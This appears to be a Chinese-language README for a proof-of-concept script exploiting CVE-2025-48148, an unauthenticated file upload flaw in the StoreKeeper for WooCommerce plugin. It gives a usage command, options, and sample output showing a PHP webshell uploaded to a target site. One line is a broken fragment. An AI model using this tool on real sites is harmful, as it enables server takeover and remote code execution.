
StoreKeeper for WooCommerce <= 14.4.4 - 未经认证的任意文件上传
StoreKeeper for WooCommerce <= 14.4.4 - 未认证任意文件上传
WordPress 的 StoreKeeper for WooCommerce 插件由于在 14.4.4 及之前的所有版本中缺少文件类型验证,因而存在任意文件上传漏洞。
这允许未认证的攻击者向受影响站点的服务器上传任意文件,进而可能导致远程代码执行。
脚本名称: CVE-2025-48148.py
该脚本是 CVE-2025-48148 的专业概念验证(PoC)漏洞利用脚本,旨在自动化利用 StoreKeeper for WooCommerce 插件向存在漏洞的 WordPress 站点上传 WebShell 的过程。
nonce 令牌,即使该值发生变化也能确保可靠性。python3 CVE-2025-48148.py -u "http://target.com/wordpress/"
可选参数:
--debug 启用详细输出。--insecure 跳过 SSL 证书验证。示例:
[*] Extracting nonce...
[+] Nonce extracted: 66e372c7e0
[+] Shell file created: shell.php
[*] Uploading shell...
[+] Upload response:
{"success":true,"data":{"url":"http://target.com/wp-content/uploads/shell.php"}}
📧 邮箱: [email protected]
📨 Telegram: @Kxploit
本脚本仅供教育和授权渗透测试目的使用。
作者不对因使用此工具而造成的任何滥用或损害负责。在测试任何系统之前,请务必获得适当的授权。
作者:Nxploited(Khaled Alenazi)